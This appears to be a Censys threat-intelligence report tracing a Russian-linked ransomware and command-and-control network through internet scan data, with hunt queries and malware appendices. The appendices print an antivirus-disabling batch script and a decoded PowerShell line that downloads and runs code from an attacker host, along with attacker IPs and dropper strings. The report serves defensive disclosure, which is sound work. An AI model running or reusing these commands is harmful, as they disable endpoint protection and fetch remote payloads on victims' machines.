# Russian Ransomware C2 Network Discovered in Censys Data ###### Prepared on: 18 July 2022 Table of Contents ● Link Analysis Diagram ● Executive Summary ● Explanation of Findings ● Summary Analysis ● Proactive Hunt Playbook ● Appendices ----- ## Link Analysis Diagram ----- ## Executive Summary ###### Overview On or about 24 June 2022, out of over 4.7 million hosts Censys observed in Russia, Censys discovered two Russian hosts containing an exploitation tool, Metasploit, and Command and Control (C2) tool, Deimos C2. Historical analysis indicated one of these Russian hosts also used the tool PoshC2. These tools allow penetration testers and hackers to gain access to and manage target hosts. Censys then used details from the PoshC2 certificate to locate, among hosts elsewhere in the world including the US, two additional Russian hosts also using the PoshC2 certificate. Censys data showed these two Russian hosts possessing confirmed malware packages, one of which included a ransomware kit and a file that indicated two additional Russian Bitcoin hosts. Additionally, Censys located a host in Ohio also possessing the Deimos C2 tool discovered on the initial Russian host and, leveraging historical analysis, discovered that the Ohio host possessed a malware package with software similarities to the Russian ransomware hosts possessing PoshC2 mentioned above, in October 2021. Assessment Censys assesses that initially discovered Russian Hosts A & B with Metasploit and Deimos C2 are possibly initial attack vectors to take over victim hosts. Russian Hosts F & G possess malware capable of disabling anti-virus and performing a ransomware attack, with beacons to two Bitcoin nodes that likely receive ransomware payment from victims. Methodology Censys conducts continuous technical Internet scanning on all publicly available IPv4 hosts in the world. In this investigation, Censys leveraged its own data in the form of software enumeration, certificate documentation, historical evidence, HTTP body responses, and geolocational data to identify and pivot through this network. Censys confirmed the offensive exploit, C2, and malware tools through 3rd party sources referenced in this report. ----- #### & Metasploit Discovery ###### On or about 24 June 2022, Censys ran a report to view the top 1000 software products currently observable amongst the over 7.4 million hosts discovered by Censys in Russia. Metasploit, a penetration testing toolkit developed by Rapid7, was observed by Censys on nine of these hosts. Although Metasploit enables users to compromise target hosts, it is used by many legitimate penetration testing teams for cybersecurity purposes, so Censys investigated the hosts’ current postures to look for any other indicators of nefarious activity. On one host - 5.101.5[.]196 or, Host A - Censys also found the web vulnerability tester Acunetix on port 3443 as well as the Deimos C2 tool on port 8443. Since those additional tools were only found on Host A, Censys decided to investigate further ----- ##### Deimos C2 JARM fingerprint search ###### Deimos C2 “is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised.”[1] This is also a tool used by legitimate cybersecurity penetration testers to manage their operations and it stands to reason that a host used for such purposes might have both Metasploit, Acunetix, and a C2 tool. However, given Host A’s country of origin and the presence of the additional tools on only one host, we searched Censys’ data via the JARM fingerprint associated with Deimos C2 to determine the prevalence of Deimos C2 worldwide. If Deimos C2 was highly prevalent, then it might be a benign connection. Instead, Censys found only three other hosts with a matching Deimos C2 JARM fingerprint, highlighted below. The Chinese host (Host C) had a matching JARM fingerprint, but did not seem to have any other identifying data points. Russian Host B listed Deimos C2 in the HTML Title, as did the original Russian host and mirrored the same ports, protocols, and software almost exactly. Ohio Host D, however, did not have a similar configuration, but did match the Deimos C2 JARM and the HTML title. ----- ##### Deimos C2 JARM fingerprint search ###### See For Yourself - Run This Query: services.jarm.fingerprint: 1bd1bd1bd0001bd00041d1bd1bd41db0fe 6e6bbf8c4edda78e3ec2bfb55687 ----- ## Host D with Deimos C2 ###### Host D had Deimos C2 running on port 8443 as recently as 06 July 2022. Also notable, was that Censys observed “Squid Cache Squid 3.5.27” software on port 31337, which is a “is a caching and forwarding HTTP web proxy.”[2] Proxies have legitimate uses, but “[a]dversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.”[3] 2 [https://en.wikipedia.org/wiki/Squid_(software)](https://en.wikipedia.org/wiki/Squid_(software)) 3 [https://attack.mitre.org/techniques/T1090/002/](https://attack.mitre.org/techniques/T1090/002/) ----- ## Host D with Deimos C2 ----- #### original Russian host ###### After locating ransomware executables on Ohio Host D, Censys revisited the original Russian Host A for other indicators of nefarious activity. While conducting an historical analysis of Host A, Censys found port 31001 added on 30 May 2022 and not recently open. After reviewing the host summary on this date, Censys noticed a certificate on port 433 listing the location as Minnetonka, MN which seemed anomalous for a Russian host. What is more, the “O” or Organization listed was “Pajfds” and the “OU” or Organizational Unit listed was “Jethpro” which seemed suspicious to Censys. Censys performed a Google search for these certificate details and found the exact same certificate details listed as an Indicator of Compromise (IOC) for the PoshC2 tool, on the website of the developer, Nettitude Labs. PoshC2 is a free and open source, “proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.” The website also lists an HTTP response as an IOC that mirrors the response Censys obtained from Russian Host A during scanning. ----- #### Fremont Host K with PoshC2 ###### On 21 April 2021, Censys observed Host K with a PoshC2 certificate and possible malware kit on port 80 with a directory format identical to other PoshC2 hosts with confirmed malware kits, but Censys was unable to link any of the files listed on Host K to any known malware or nefarious activity. Similar to Virginia Host E, however, the Fremont host does also have Python and Apache software installed. Censys is hesitant to suggest this could be a proxy of a C2 network as Censys found no direct ties to any Russian hosts, either nefariously identified in this report or otherwise, except for the presence of the PoshC2 certificate and similar directory listing format. A possible explanation is that this host is functioning as a legitimate penetration testing tool by legitimate security practitioners. Censys is including this host in the report for thoroughness and to allow other researchers to rule out the host as nefarious. A file analysis was not possible as the host has closed this port and Censys’ observance of the possible malware kit was historical. ----- #### original Russian host ----- #### Other Hosts ###### ● Hosts K through O with only the PoshC2 certificate See For Yourself - Run This Query: n=`C=US, ST=Minnesota, L=Minnetonka, O=Pajfds, OU=Jethpro, ----- #### Russian Host F with PoshC2 ###### Host F was presenting the PoshC2 HTTP response and certificate as recently as 22 June 2022. Additionally, on port 8000, Censys discovered not only Python software previously mentioned as required for attackers to implant on targets, but also an HTTP response that includes the malware kit depicted below. This was observed as recently as 07 July 2022. This malware kit allows an attacker to disable a target’s antivirus, remotely manage the target, contains a trojan and callbacks to two other Russian hosts with operational Bitcoin ports, one of which is listed on a Bitcoin node directory. This same host, 92.53.90.70, also previously had a Covenant C2 certificate and HTML Title on 05 May 2022. A full malware analysis of the kit found on Host F can be found in Appendix A. ###### of a ransomware C2 network, likely as an attacker or a proxy (as a victim is possible, however, Censys’ historical analysis indicates the presence, removal, and reemergence of the PoshC2 certificate and a persistence of the malware kit modified over time which would be more in line with an attacker modifying their attack methods). ----- #### Russian Host F with PoshC2 ###### Disables Windows Defender & Malwarebytes Anti Spyware ----- #### Russian Host G with PoshC2 ###### This host was presenting the PoshC2 HTTP response and certificate as recently as 07 July 2022. Censys also observed the same Python software and a similarly formatted malware kit to Russian host F on port 8000, but the contents of the malware kit were different. Censys malware analysis via VirusTotal indicates this kit included penetration testing access and C2 tool Cobalt Strike, a call back to itself, credential theft tool Mimikatz, and WinRar that can encrypt files and has been used by ransomware groups to do so. possibly indicating that this host is used for initial access on target hosts. Further confirmation of the existence of PoshC2 can be found via the “PoshC2.bat” file used to execute commands for the tool as well as “dropper_cs.exe” identified in a package on infosecn1nja’s GitHub page. A full malware analysis of this kit can be found in Appendix B. VirusTotal indicates this is Cobalt Strike File appears to call back to itself. 95.213.145[.]101/adServingData/PROD/TMClient/6/8736/?c. “/adServingData/PROD/TMClient/6/8736” is a documented IOC related to PoshC2. Subset of the main.exe code, appears to be python components. Purpose unknown. 7zipped archive containing Mimikatz w/ password protected files Zipped archive containing Mimikatz w/ non-password protected files including passwords.txt (all matching size of version above) Batch file to execute PoshC2 commands. Includes URL callback to same host, a known IOC for PoshC2. ###### A full malware analysis of this kit can be found in Appendix B. ----- #### Hosts E & H with PoshC2 ###### Host E was observed with the PoshC2 certificate and HTTP response as recently as 07 July 2022 on port 443. The same Python software as Hosts F and G as well as a different malware kit were observed on the host as recently as 28 June 2022. A direct malware analysis could not be performed since, at the time of Censys’ discovery of the host, the port on which the malware package was located, 443, was closed. The kit contained 155 files, several of which were identified as malicious by JoeSandbox and Hybrid Analysis but no direct links to ransomware was identified. A full file list can be found in Appendix C. Censys ran Google searches for the files included in the kit, and found matches to a host - Host H - based in the UK, but on Russian network Selectel, via a Pastebin drop dated 19 July 2021. Censys performed an historical analysis on Host H and confirmed existence of the malware files at the same time as well as a PoshC2 certificate on port 443 on 17 September 2021 (this host was not observed during the original PoshC2 certificate search as this host had closed port 443 at the time of said search). Censys used JoeSandbox and Hybrid Analysis to confirm the malware and identified ties to ransomware. A full malware list can be found in Appendix D. This host is currently listed as based in St. Petersburg, Russia and was identified by @r3dbU7z on Twitter as part of the MedusaLocker group. Additionally, Apache HTTPD software on port 443 was observed on Virginia Host E as recently as 25 June 2022. According to PoshC2 documentation, an attacker can use Apache software on a proxy host to silently redirect traffic to the C2 server and attacker from the target, without the target host knowing. This would serve to hide the origin of the true attacker. It is possible that the Virginia host was or is functioning as such a proxy within the US so as to be trusted by other US-based potential victim hosts, however, Censys does not possess the data to confirm this. Nettitude Labs ----- Nettitude Labs ----- #### Hosts L thru O with PoshC2 ###### Censys observed Hosts L through O each with a PoshC2 certificate, but did not find directories similar to other hosts with confirmed malware kits. ###### However, Censys did observe Apache software on Hosts L, M and O which PoshC2 documentation states an attacker can use on a proxy host to silently redirect traffic to a C2 server and attacker from the target, without the target host knowing, as previously stated for Host E on page 16. This fact is a possible indicator that Hosts L through O could be currently or are intended to be used as C2 proxies, but this possible indicator alone is not enough to conclude that these hosts are or will function as C2 proxies. It should also be noted that, similar to Host H, Censys observed Host O geographically in the Netherlands, but on Russian virtual dedicated server provider VDSINA-NL (RU) with known server locations in both Russia and the Netherlands. This fact is merely an additional indicator of possible Russian control/presence on the host. Nettitude Labs ###### Netherlands. This fact is merely an additional indicator of possible Russian control/presence on the host. ----- #### Summary Analysis ###### The discovery of Metasploit on Host A uncovered the tool Deimos C2. A Censys search on the JARM fingerprint of Deimos C2 uncovered Host D with the same tool, but also a web proxy which can be used to hide the identity of a true attacker, and a piece of malware in October 2021 tied to the Karma ransomware group. Censys’ assumption is that, while we are currently unable to tie Host D to any attack, the intent of the host was to levy its ransomware kit against targets. ###### The fact that both Host D and original Host A both had the Deimos C2 tool can be considered coincidental. However, the fact that Host D’s malware directory format and Python software mirrored that of MedusaLocker-linked Hosts F and G, and that both of those hosts not only possessed confirmed ransomware but also linked back to Host A via the PoshC2 certificate, could mean that Host D was functioning as a proxy for Host A. However, Censys was unable to observe Deimos C2 on Host A during or before the October 2021 timeframe during which Host D possessed malware. Chinese Host C did have the Deimos C2 JARM during this time period, but no other indicators of Deimos C2 or malware. ###### Censys assesses that Hosts F and G, however, are confirmed ransomware hosts that are either functioning as original attackers or as C2 servers/nodes due to the confirmed ransomware on both hosts and Host F’s possession of a file that points to Bitcoin Hosts I & J, presumably for ransomware victims to pay the ransom in Bitcoin. The link of Hosts F and G to initial Host A is circumstantial based only on the existence of the PoshC2 certificate and being hosted in Russia - further analysis with other data types is required to conclude or rule out any direct connection. Hosts E and H share the PoshC2 certificate circumstantial tie to Host A, but share with each other, a similar malware kit. While Host E’s malware kit was not directly tied to ransomware, Host H’s was and the files, while similar, seemed to be modified. Censys suspcets these two hosts are/were used as C2 proxies, especially as Host H was previously hosted in the UK but via a Russian network provider and is now listed as based in Russia. ###### Censys leveraged its own temporal visibility of worldwide hosts to find hosts with cyber exploitation tools and C2 tools and then pivot within its own data to uncover hosts related to those tools, possessing proxy software, and malware kits. While many connections are circumstantial, Censys is certain that it uncovered Hosts F and G are fully capable of carrying out ransomware attacks and funnelling Bitcoin payment to Hosts I and J. Censys encourages the rest of the community to investigate other connections mentioned in this report to confirm or deny a wider ransomware network. ----- ### 1. #### Proactive Hunt Playbook ###### Initial search for all hosts Censys observes geographically located in Russia. location.country= `Russia` ### 2. ### 3. ### 4. ### 5. ### 6. |G, suspicious hosts K, E, and H, as well as Hosts L -O. services.tls.certificates.leaf_data.subject_dn=`C=US,|ST=Minnesota,| |---|---| |L=Minnetonka, O=Pajfds, OU=Jethpro, CN=P18055077`|| ||| ----- #### Malware Analysis on Host F As seen on Censys ----- #### Malware Analysis on Host F As seen on Censys ----- #### Malware Analysis on Host F con’t As seen on Censys ###### def1.bat - MD5: 1393dab192ea2e2427889839a2d8fcf7 Function - disable antivirus (Windows Defender Security Center) VirusTotal analysis Contents: (Continued on next page) reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f rem 0 - Disable Logging reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f rem Disable WD Tasks schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable ----- #### Malware Analysis on Host F con’t As seen on Censys ###### def1.bat - MD5: 1393dab192ea2e2427889839a2d8fcf7 Function - disable antivirus (Windows Defender Security Center) VirusTotal analysis Contents: (Continued on next page) rem Disable WD systray icon reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f rem Remove WD context menu reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f rem Disable WD services powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "C:\ powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "D:\ powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "E:\ powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "F:\ reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender, DisableAntiSpyware and DisableAntiVirus 1 /f reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f ----- #### Malware Analysis on Host F con’t As seen on Censys ----- #### Malware Analysis on Host F As seen on Censys ----- #### Malware Analysis on Host F As seen on Censys ----- #### Analysis on Host F As seen on Censys ----- #### Malware Analysis on Host F As seen on Censys ----- #### Malware Analysis on Host G As seen on host ----- #### Malware Analysis on Host G ###### dropper_cs.exe - MD5: 340c112e41da74f58eb3cf514cd03932 Function - beacon to 95.213.145[.]101/adServingData/PROD/TMClient/6/8736/?c. “/adServingData/PROD/TMClient/6/8736” is a documented IOC related to PoshC2. Virustotal - 31 security vendors flagged this file as malicious Contents: (Continued on next page) _newImgs ReadIntPtr strings dropper_cs.exe CommandLineToArgvW PtrToStringUni !This program cannot be run in DOS mode. shell32.dll FreeHGlobal .text lpCmdLine first `.rsrc pNumArgs second @.reloc GetCurrentThread Byte XZiov kernel32.dll Buffer iY(! TerminateThread BlockCopy BSJB hThread Array v4.0.30319 dwExitCode cookie #Strings GetConsoleWindow ServicePointManager #GUID ShowWindow System.Net #Blob user32.dll set_SecurityProtocol _ j hWnd SecurityProtocolType nCmdShow Exception Program baseAddr get_Message UrlGen IntPtr Console ImgGen .ctor WriteLine SW_HIDEN String WebClient SW_SHOW IsNullOrEmpty WebProxy taskId Environment set_Address pKey get_UserDomainName NetworkCredential dfarray ToLower set_Credentials dfhead Contains ICredentials basearray ManualResetEvent set_UseDefaultCredentials rotate System.Threading set_BypassProxyOnLocal DllBaseAddress Object set_Proxy _stringnewURLS WaitHandle IWebProxy List`1 WaitOne get_Proxy System.Collections.Generic Zero CredentialCache _randomURI op_Equality get_DefaultCredentials _baseUrl Win32Exception Empty _rnd System.ComponentModel Replace Random get_Size Trim System Marshal get_Headers As seen on host ###### - MD5: 340c112e41da74f58eb3cf514cd03932 ----- #### Malware Analysis on Host G con’t As seen on host ###### - MD5: 340c112e41da74f58eb3cf514cd03932 System.Collections.Specialized Format HttpRequestHeader Convert FromBase64String Copy SymmetricAlgorithm System.Security.Cryptography ToBase64String CreateDecryptor ICryptoTransform TransformFinalBlock Encoding System.Text get_UTF8 GetString Char Clear WindowsIdentity System.Security.Principal GetCurrent WindowsPrincipal IsInRole WindowsBuiltInRole comp unByte GetBytes CreateEncryptor get_IV RijndaelManaged AesCryptoServiceProvider set_Mode CipherMode set_Padding PaddingMode set_BlockSize set_KeySize set_IV G t IV <>f__am$cache0 RemoteCertificateValidationCallback System.Net.Security set_ServerCertificateValidationCallback CultureInfo System.Globalization get_InvariantCulture DateTime ParseExact IFormatProvider get_Now op_GreaterThan get_Name get_UserName Concat GetEnvironmentVariable Process System.Diagnostics GetCurrentProcess get_Id get_ProcessName set_CurrentDirectory Int32 DownloadString Match get_Groups GroupCollection get_Item Group ToString MemoryStream System.IO GZipStream System.IO.Compression Stream CompressionMode Write IDisposable assemblyqNme <>f__am$cache1 Func`2 AssemblyName System.Reflection Assembly Type GetType Func`4 Split StringSplitOptions StartsWith Enumerable System.Linq Skip IEnumerable`1 AppDomain get_CurrentDomain GetAssemblies get_FullName get_Assembly get_EntryPoint MethodInfo MethodBase Invoke InvokeMember BindingFlags Binder NullReferenceException get_StackTrace time unit Parse stringURLS RandomURI baseUrl Matches MatchCollection ----- #### Malware Analysis on Host G con’t As seen on host ###### - MD5: 340c112e41da74f58eb3cf514cd03932 System.Collections Select Where ToList get_Count Next Guid NewGuid RegexOptions CompilerGeneratedAttribute System.Runtime.CompilerServices Capture get_Value stringIMGS length Repeat <>f__am$cache2 cmdoutput get_Length get_Chars encByte UploadData baseURL KillDate Sleep Jitter get_Success StringWriter SetOut TextWriter StringBuilder Double TryParse NumberStyles op_LessThan EventWaitHandle set_Length c__AnonStorey1 Thread GetImgData ThreadStart m__2 Start <>m__0 AppendLine dropper_cs GetStringBuilder RuntimeCompatibilityAttribute Remove mscorlib WebException System.Core name dropper_cs.exe c__AnonStorey0 WrapNonExceptionThrows LastOrDefault _CorExeMain Sharp mscoree.dll Main CLArgs Combine GetWebRequest Decryption ihInteg Encryption CreateCam AUnTrCrts primer Compress LoadS rAsm Parse_Beacon_Time Exec ImplantCore .cctor m__0 X509Certificate System.Security.Cryptography.X509Certific ates X509Chain SslPolicyErrors m__1 Init GenerateUrl m__0 m 1 ----- #### Malware Analysis on Host G ----- #### Analysis on Host G As seen on host ###### - MD5: 02f2500b54868acc3b69944f1bf12ae2 ----- #### Analysis on Host G As seen on host ###### - MD5: 0b3e92b13fcf8d8d65621f92d32cad0e ###### Analysis: This upload was the first time VT had seen this file. Contents appear to be similar to MIMIMI.7z, though without being able to see the password-protected files in !logs from MIMIMI.7z, it is difficult to say whether the contents are entirely the same. The NTLM.txt, Passwords.txt, Result.txt, SHA.txt, and Users.txt files in this archive’s !logs directory are the same sizes as the ones in the screenshot from the 7z file above. However, unlike MIMIMI.7z, the files in this archive are not password protected. Screenshots and links to full output are below. Notably, Passwords.txt was empty. NTLM.txt, SHA.txt, Users.txt, and Result.txt can be found here. ----- #### Analysis on Host G con’t ----- #### Malware Analysis on Host G As seen on host ###### PoshC2.bat - MD5: 96f8a516919536f8f3da32bc5eb58bda Function - Given the name, it may be the installer for the PoshC2 tool on a victim host. Confirmation is needed. Virustotal - 3 security vendors and 1 sandbox flagged this file as malicious Contents: (subsets below; full .txt files available upon request) Decoded base64 string to reveal the following command: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$MS=[System.Text.Encoding]::UTF8.GetString([System.Convert]::From Base64String((new-object system.net.webclient).downloadstring(‘https://95.213.145.101/uasclient/0. 1.34/modules/_rp’)));IEX $MS ----- #### Malware Analysis on Host G As seen on host ###### - MD5: 8a6217d94e1bcbabdd1dfcdcaa83d1b3 ----- #### Malware/Exploit Kit on Host E ###### Contents: (Continued on next page) **# Directory listing for /** - _* *_ - [aes.py](aes.py) - [cs_sct.xml](cs_sct.xml) - [dropper.cs](dropper.cs) - [dropper_cs.exe](dropper_cs.exe) - [dropper_cs_ps_pbind_v4.exe](dropper_cs_ps_pbind_v4.exe) - [dropper_cs_ps_v2.exe](dropper_cs_ps_v2.exe) - [dropper_cs_ps_v4.exe](dropper_cs_ps_v4.exe) - [dropper_jxa.js](dropper_jxa.js) - [DynamicCode.cs](DynamicCode.cs) - [fcomm.cs](fcomm.cs) - [fcomm_cs.exe](fcomm_cs.exe) - [FCommSharp_v4_csc.cs](FCommSharp_v4_csc.cs) - [FCommSharp_v4_Donut_x64_Shellcode.b64](FCommSharp_v4_Donut_x64_Shellcode.b64) - [FCommSharp_v4_Donut_x64_Shellcode.bin](FCommSharp_v4_Donut_x64_Shellcode.bin) - [FCommSharp_v4_Donut_x86_Shellcode.b64](FCommSharp_v4_Donut_x86_Shellcode.b64) - [FCommSharp_v4_Donut_x86_Shellcode.bin](FCommSharp_v4_Donut_x86_Shellcode.bin) - [FCommSharp_v4_DotNet2JS.b64](FCommSharp_v4_DotNet2JS.b64) - [FCommSharp_v4_DotNet2JS.js](FCommSharp_v4_DotNet2JS.js) - [FCommSharp_v4_dropper_migrate_x64.c](FCommSharp_v4_dropper_migrate_x64.c) - [FCommSharp_v4_dropper_migrate_x64.exe](FCommSharp_v4_dropper_migrate_x64.exe) - [FCommSharp_v4_dropper_migrate_x86.c](FCommSharp_v4_dropper_migrate_x86.c) - [FCommSharp_v4_dropper_migrate_x86.exe](FCommSharp_v4_dropper_migrate_x86.exe) - [FCommSharp_v4_dropper_x64.c](FCommSharp_v4_dropper_x64.c) - [FCommSharp_v4_dropper_x64.exe](FCommSharp_v4_dropper_x64.exe) - [FCommSharp_v4_dropper_x86.c](FCommSharp_v4_dropper_x86.c) - [FCommSharp_v4_dropper_x86.exe](FCommSharp_v4_dropper_x86.exe) - [FCommSharp_v4_msbuild.xml](FCommSharp_v4_msbuild.xml) - [FCommSharp_v4_x64.dll](FCommSharp_v4_x64.dll) - [FCommSharp_v4_x64_Shellcode.b64](FCommSharp_v4_x64_Shellcode.b64) - [FCommSharp_v4_x64_Shellcode.bin](FCommSharp_v4_x64_Shellcode.bin) - [FCommSharp_v4_x86.dll](FCommSharp_v4_x86.dll) - [FCommSharp_v4_x86_Shellcode.b64](FCommSharp_v4_x86_Shellcode.b64) - [FCommSharp_v4_x86_Shellcode.bin](FCommSharp_v4_x86_Shellcode.bin) - [Installer-Win.exe](Installer-Win.exe) - [Launcher.hta](Launcher.hta) - [macro.txt](macro.txt) - [payload.bat](payload.bat) - [payload.txt](payload.txt) - [pbind.cs](pbind.cs) - [pbind_cs.exe](pbind_cs.exe) - [PBind_v4_csc.cs](PBind_v4_csc.cs) - [PBind_v4_Donut_x64_Shellcode.b64](PBind_v4_Donut_x64_Shellcode.b64) - [PBind_v4_Donut_x64_Shellcode.bin](PBind_v4_Donut_x64_Shellcode.bin) - [PBind_v4_Donut_x86_Shellcode.b64](PBind_v4_Donut_x86_Shellcode.b64) - [PBind_v4_Donut_x86_Shellcode.bin](PBind_v4_Donut_x86_Shellcode.bin) - [PBind_v4_DotNet2JS.b64](PBind_v4_DotNet2JS.b64) - [PBind v4 DotNet2JS.js](PBind v4 DotNet2JS.js) ###### Contents: ( **# Directory listing for /** - _* *_ - [aes.py - [cs_sct.xml - [dropper.cs - [dropper_cs.exe - [ - [dropper_cs_ps_v2.exe](dropper_cs_ps_v2.exe) - [dropper_cs_ps_v4.exe](dropper_cs_ps_v4.exe) - [dropper_jxa.js](dropper_jxa.js) - [DynamicCode.cs](DynamicCode.cs) - [fcomm.cs](fcomm.cs) - [fcomm_cs.exe](fcomm_cs.exe) - [FCommSharp_v4_csc.cs](FCommSharp_v4_csc.cs) - [FCommSharp_v4_Donut_x64_Shellcode.b64 - [FCommSharp_v4_Donut_x64_Shellcode.bin - [FCommSharp_v4_Donut_x86_Shellcode.b64 - [FCommSharp_v4_Donut_x86_Shellcode.bin ----- #### Malware/Exploit Kit on Host E con’t - [PBind_v4_x64_Shellcode.b64](PBind_v4_x64_Shellcode.b64) - [PBind_v4_x64_Shellcode.bin](PBind_v4_x64_Shellcode.bin) - [PBind_v4_x86.dll](PBind_v4_x86.dll) - [PBind_v4_x86_Shellcode.b64](PBind_v4_x86_Shellcode.b64) - [PBind_v4_x86_Shellcode.bin](PBind_v4_x86_Shellcode.bin) - [PBindSharp_v4_csc.cs](PBindSharp_v4_csc.cs) - [PBindSharp_v4_Donut_x64_Shellcode.b64](PBindSharp_v4_Donut_x64_Shellcode.b64) - [PBindSharp_v4_Donut_x64_Shellcode.bin](PBindSharp_v4_Donut_x64_Shellcode.bin) - [PBindSharp_v4_Donut_x86_Shellcode.b64](PBindSharp_v4_Donut_x86_Shellcode.b64) - [PBindSharp_v4_Donut_x86_Shellcode.bin](PBindSharp_v4_Donut_x86_Shellcode.bin) - [PBindSharp_v4_DotNet2JS.b64](PBindSharp_v4_DotNet2JS.b64) - [PBindSharp_v4_DotNet2JS.js](PBindSharp_v4_DotNet2JS.js) - [PBindSharp_v4_dropper_migrate_x64.c](PBindSharp_v4_dropper_migrate_x64.c) - [PBindSharp_v4_dropper_migrate_x64.exe](PBindSharp_v4_dropper_migrate_x64.exe) - [PBindSharp_v4_dropper_migrate_x86.c](PBindSharp_v4_dropper_migrate_x86.c) - [PBindSharp_v4_dropper_migrate_x86.exe](PBindSharp_v4_dropper_migrate_x86.exe) - [PBindSharp_v4_dropper_x64.c](PBindSharp_v4_dropper_x64.c) - [PBindSharp_v4_dropper_x64.exe](PBindSharp_v4_dropper_x64.exe) - [PBindSharp_v4_dropper_x86.c](PBindSharp_v4_dropper_x86.c) - [PBindSharp_v4_dropper_x86.exe](PBindSharp_v4_dropper_x86.exe) - [PBindSharp_v4_msbuild.xml](PBindSharp_v4_msbuild.xml) - [PBindSharp_v4_x64.dll](PBindSharp_v4_x64.dll) - [PBindSharp_v4_x64_Shellcode.b64](PBindSharp_v4_x64_Shellcode.b64) - [PBindSharp_v4_x64_Shellcode.bin](PBindSharp_v4_x64_Shellcode.bin) - [PBindSharp_v4_x86.dll](PBindSharp_v4_x86.dll) - [PBindSharp_v4_x86_Shellcode.b64](PBindSharp_v4_x86_Shellcode.b64) - [PBindSharp_v4_x86_Shellcode.bin](PBindSharp_v4_x86_Shellcode.bin) - [Posh_v2_csc.cs](Posh_v2_csc.cs) - [Posh_v2_Donut_x64_Shellcode.b64](Posh_v2_Donut_x64_Shellcode.b64) - [Posh_v2_Donut_x64_Shellcode.bin](Posh_v2_Donut_x64_Shellcode.bin) - [Posh_v2_Donut_x86_Shellcode.b64](Posh_v2_Donut_x86_Shellcode.b64) - [Posh_v2_Donut_x86_Shellcode.bin](Posh_v2_Donut_x86_Shellcode.bin) - [Posh_v2_DotNet2JS.b64](Posh_v2_DotNet2JS.b64) - [Posh_v2_DotNet2JS.js](Posh_v2_DotNet2JS.js) ###### Contents: ( - [ - [ - [ - [ - [ - [ - [PBind_v4_msbuild.xml - [PBind_v4_x64.dll - [PBind_v4_x64_Shellcode.b64](PBind_v4_x64_Shellcode.b64) - [PBind_v4_x64_Shellcode.bin](PBind_v4_x64_Shellcode.bin) - [PBind_v4_x86.dll](PBind_v4_x86.dll) - [PBind_v4_x86_Shellcode.b64](PBind_v4_x86_Shellcode.b64) - [PBind_v4_x86_Shellcode.bin](PBind_v4_x86_Shellcode.bin) - [PBindSharp_v4_csc.cs](PBindSharp_v4_csc.cs) - [PBindSharp_v4_Donut_x64_Shellcode.b64 - [PBindSharp_v4_Donut_x64_Shellcode.bin - [PBindSharp_v4_Donut_x86_Shellcode.b64 ----- #### Malware/Exploit Kit on Host E con’t - [Posh_v2_x64.dll](Posh_v2_x64.dll) - [Posh_v2_x64_Shellcode.b64](Posh_v2_x64_Shellcode.b64) - [Posh_v2_x64_Shellcode.bin](Posh_v2_x64_Shellcode.bin) - [Posh_v2_x86.dll](Posh_v2_x86.dll) - [Posh_v2_x86_Shellcode.b64](Posh_v2_x86_Shellcode.b64) - [Posh_v2_x86_Shellcode.bin](Posh_v2_x86_Shellcode.bin) - [Posh_v4_csc.cs](Posh_v4_csc.cs) - [Posh_v4_Donut_x64_Shellcode.b64](Posh_v4_Donut_x64_Shellcode.b64) - [Posh_v4_Donut_x64_Shellcode.bin](Posh_v4_Donut_x64_Shellcode.bin) - [Posh_v4_Donut_x86_Shellcode.b64](Posh_v4_Donut_x86_Shellcode.b64) - [Posh_v4_Donut_x86_Shellcode.bin](Posh_v4_Donut_x86_Shellcode.bin) - [Posh_v4_DotNet2JS.b64](Posh_v4_DotNet2JS.b64) - [Posh_v4_DotNet2JS.js](Posh_v4_DotNet2JS.js) - [Posh_v4_dropper_migrate_x64.c](Posh_v4_dropper_migrate_x64.c) - [Posh_v4_dropper_migrate_x64.exe](Posh_v4_dropper_migrate_x64.exe) - [Posh_v4_dropper_migrate_x86.c](Posh_v4_dropper_migrate_x86.c) - [Posh_v4_dropper_migrate_x86.exe](Posh_v4_dropper_migrate_x86.exe) - [Posh_v4_dropper_x64.c](Posh_v4_dropper_x64.c) - [Posh_v4_dropper_x64.exe](Posh_v4_dropper_x64.exe) - [Posh_v4_dropper_x86.c](Posh_v4_dropper_x86.c) - [Posh_v4_dropper_x86.exe](Posh_v4_dropper_x86.exe) - [Posh_v4_msbuild.xml](Posh_v4_msbuild.xml) - 